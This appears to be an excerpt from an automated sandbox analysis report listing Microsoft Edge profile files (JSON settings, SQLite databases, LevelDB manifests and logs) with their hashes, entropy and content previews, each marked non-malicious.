                                                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):1747
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.304563802412381
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YcCpfgCzs6tsdfcKsRleeIkBRsVCgHxeYhbm:F2ftKqkeIkBmTJhK
                                                                                                                                                                                                                                                                                                MD5:08EEE8FEA5F237AF55738C11516E773C
                                                                                                                                                                                                                                                                                                SHA1:E482815B270A93ABBE52F5A86A13BEEB42277D12
                                                                                                                                                                                                                                                                                                SHA-256:9CE924F5D9CE433FF7606F48E1102E1AF6BBABB3B057C106EE3AE8BE86DDCDA9
                                                                                                                                                                                                                                                                                                SHA-512:EA3884148105E6EB6FF997249129130E7B95465CF21C5C10A882A3AF7529879910E6E0356668B67034DE2E9C9837F2BB6AC26442848173FBBA830840A83B8F16
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381741895740429","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381741899520857","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379243502383431","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.768628338935642
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:tTjmZhY+8Dpx/JCgVQxLbUoobYglGXcf0L/ZJVb:VjKhiD3/JCgVULb9gUXI0LhJVb
                                                                                                                                                                                                                                                                                                MD5:FC50CEC91D94FB80367861BD9C278B14
                                                                                                                                                                                                                                                                                                SHA1:98BFBDA85312AE60BD93CA51FCF2C3845871BBDD
                                                                                                                                                                                                                                                                                                SHA-256:197A6667CAEBE8CF5D9A80100E19F52421DB8C435879E54B5A88CF89F6059DC1
                                                                                                                                                                                                                                                                                                SHA-512:7CC75E737A5C51B5CC325DDD5EDE6DF7B2A693706F7D63761566E2A22AECB2FC7B1972F971BB9085E8D0D01A494C43F515C2B69BBC63DAC1A6C2010402370BC8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.3780154367115918
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB5R:JkIEumQv8m1ccnvS6JK+lGFh51haw1a
                                                                                                                                                                                                                                                                                                MD5:BEF012FA590794516E9AAC90F428CAAB
                                                                                                                                                                                                                                                                                                SHA1:8640463349A5AA82ABCB83F60911BF9621C39C09
                                                                                                                                                                                                                                                                                                SHA-256:892E49E695B9244AF5CFCC4532DA7820767DB6DAC08C0F17945FAB35DEC3FD79
                                                                                                                                                                                                                                                                                                SHA-512:753CD910527A81227C4678231F5EC5F0B027164731CBF03C176E0E63F56A10EFC66D129E1B21409BCA97B558774EBD54DD05EF1D03350C35F6EA9D3FDA1DEE25
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.567490185483211
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:YQxNMrWoUW5wcOf4yt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP0QIGLeurwXhfpXtL:Ya+rxUWacOfTtu1jat0KrntL
                                                                                                                                                                                                                                                                                                MD5:438FDD906E9FAB2679F38815B79A49AD
                                                                                                                                                                                                                                                                                                SHA1:83097EAF926A2FFE2D3F7F2EE424B78DD10E2B32
                                                                                                                                                                                                                                                                                                SHA-256:CBCEF6D7A9FFE7B7E80E4F5F468F8E2E7E597568C5871F2256CEBDECEA2E8047
                                                                                                                                                                                                                                                                                                SHA-512:B2619B4C1E043B5F085DB40D931AF11421BCEBC59C1E7A4C5C70AEB585CA06B67923DD2BEB24C682BF49404589C7C087935121D7C436613C350791574842C0DB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379149891335447","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379149891335447","location":5,"ma
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2394
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.811668193840264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:F2xc5NmycncmoDCRORpllg2hE5fRHFldCRORpllg2h8LTBFCRORpllg2hEkRHFU9:F2embMrd65fBzrd4Zrd6kBurd2Bu
                                                                                                                                                                                                                                                                                                MD5:EE2224F969C342959F1AD683A9FE191C
                                                                                                                                                                                                                                                                                                SHA1:0F3DD87179A87050BBD03C23162A1E3749B60993
                                                                                                                                                                                                                                                                                                SHA-256:B1901674AB2D48E0BF97A63838DD4861F41EE33F3AC0491AE0989DC38CACB3A0
                                                                                                                                                                                                                                                                                                SHA-512:43FA253ED73D8CA6552C662101979D2EDE46812A4EEC8095BA9D74D17DC442D70C5FCAA8EFC26F1839F150D962E28D2DF92A7C88754A64C2D741BFB71F4E5E78
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):303
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.150881532413995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PfJwmRq1N723oH+TcwtE/a252KLl1ZazN+q2PN723oH+TcwtE/a2ZIFUv:nqDaYeb8xLgIvVaYeb8J2FUv
                                                                                                                                                                                                                                                                                                MD5:2DEA2C4BF1FC7D6F81EC28948979C07A
                                                                                                                                                                                                                                                                                                SHA1:0F94F490E1BF3A2FE846F82A682676976D8EBA08
                                                                                                                                                                                                                                                                                                SHA-256:B79F5C2F779771E658A38AF445ADFB2357371561AC97C0DAF01F14DD36C42F50
                                                                                                                                                                                                                                                                                                SHA-512:61E65BE3E1D1E6BA1B8E6AF3353D870176AE6B644543851DCF877E942DE7FFFE24553CC954677CA6DA6E18FB9DCAEBDB0C931CF3139E46BA4BFE496454859ABF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:49.026 1538 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/20-01:31:49.046 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
